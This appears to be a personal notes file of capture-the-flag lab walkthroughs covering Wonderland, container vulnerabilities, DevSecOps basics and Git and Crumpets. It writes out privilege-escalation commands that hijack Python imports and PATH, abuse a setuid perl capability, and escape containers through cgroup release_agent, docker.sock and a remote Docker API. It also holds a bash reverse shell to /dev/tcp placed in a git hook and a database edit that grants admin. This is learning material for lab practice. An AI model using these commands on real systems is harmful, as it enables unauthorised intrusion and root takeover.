INDEX

2024-01-01 01:47 - Wonderland

Just going to write any novel issues I encounter
Gobuster - found /r - eventually /r/a/b/b/i/t
Looking in source of page seems to have what looks like login credentials
	<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>

Usual thing you check is what the user can run as sudo
In this case, an arbitrary python script as another user
	sudo -l
	sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
	# File is not editable

For some reason the key to this is to look in /root/user.txt
Ah so apparently with the way it imports "random" you can override it and run your own script
	# random.py
	import os
	os.system("/bin/bash")

This file has some strange permissions - file gets executed as root so change what it runs
	-rwsr-sr-x 1 root   root    17K May 25  2020 teaParty
	# Inside this file
	/bin/echo -n 'Probably by ' && date --date='next hour' -R

So you override the date file and run it normally
	export PATH=/tmp:$PATH
	echo -e "#!/bin/bash\n/bin/bash" > /tmp/date
	./teaParty # Now you are "hatter"

For some reason the next step gives the solution
Don't know enough about getcap to see why but apparently it's part of "PayloadAllTheThings"
	getcap -r / 2>/dev/null
	perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
	whoami # should be root now

Seems kind of a dumb room but that's enough info to be valuable


2024-02-02 11:36 - Container Vulnerabilities

If hostname is a hash it's likely a docker container - will be minimal but may have key info
Look for mismanaged containers, vulnerable images, networking and hardcoded passwords
Containers are run in user mode or privileged mode (bypasses docker engine to use os features)
	capsh --print # (libcap2-bin) shows what syscalls are allowed by container

	# Mount Exploit
	mount -t cgroup -o rdma cgroup /tmp/cgrp # Mount cgroup management files to a local folder
	echo 1 > /tmp/cgrp/x/notify_on_release # Tell kernel to run code once cgroup is "finished"
	## Set host_path variable to where container's files are stored on the host
	echo "$host_path/exploit" > /tmp/cgrp/release_agent # Save filename to be run
	echo '#!/bin/sh ...' > /exploit; chmod a+x /exploit # Save arbitrary shell command to run
	sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" # Create aritificial process to be "released"
	
Docker IPCs require your user to be in the docker group to run
Docker engine uses sockets to interact with container - find "docker.sock" file
	ls -la /var/run | grep sock

	docker run -v /:/mnt --rm -it alpine chroot /mnt sh # Mount host filesystem inside container

By default, remotely accessible docker runs on port 2375
	nmap -sV -p 2375 IP # Check if remote accessiblity running
	curl http://IP:2375/version # Interact with API using curl
	docker -H tcp://IP:2375 COMMAND # Run arbitrary docker commands on controller

If a container is in the same namespace as the controller it can be exploited
	ps aux # Check if host processes are visible
	nsenter --target 1 --mount --uts --ipc --net /bin/bash # Namespace-enter the main namespace


2024-02-02 12:20 - Intro to DevSecOps

Shifting left = moving security/testing to earlier stages rather than just at the end
DevSecOps = Devops + shifting left
Main challenges: siloed security team, lack of visibility and complex environments

Teams must be autonomous through automating key pipeline processes
All services must support monitoring - visible security checks amd testing


2024-02-02 15:45 - Git and Crumpets

Get a server with 80 exposed, curl it - "haven't sorted dns yet" clue = add to /etc/hosts
	echo "IP git.git-and-crumpets.thm" >> /etc/hosts # Then open http://git.git-and-crumpets.thm
	# gitea instance - make account - look at repos - commit history - comments in commits
	# Says the password is stored in the avatar image

Had to install steghide from aur
	makepkg - -si # Download PKGBUILD file then install it
	# Essentially installs with pacman so can uninstall with that too
	# Installed "yay" so now further packages are easier to install
	yay steghide

Actually looks like the password is stored as text in the image
	strings FILENAME # Literally "SCONES:Password"
	# Go on repo - add hook:
	/bin/bash -c 'bash -u >& /dev/tcp/<IP>/<PORT> 0>&1

	nc -lnvp PORT # Now run reverse shell listener on local machine
	python3 -c "import pty; pty.spawn('/bin/bash')" # Elevate shell

	# Look in random folders - /home/git - find file - base64 decode
	cat /home/git/user.txt | base64 -d

Gitae has been the main focus so look at data files for that - /var/lib/gitae/data
	sqlite3 /var/lib/gitea/data/gitea.db 
	.table # List all tables - if this fails, do ".exit" and reopen
	SELECT * FROM USER;

	UPDATE user SET is_admin=1 WHERE id=3;
	# Then log in as user 3 - should have admin access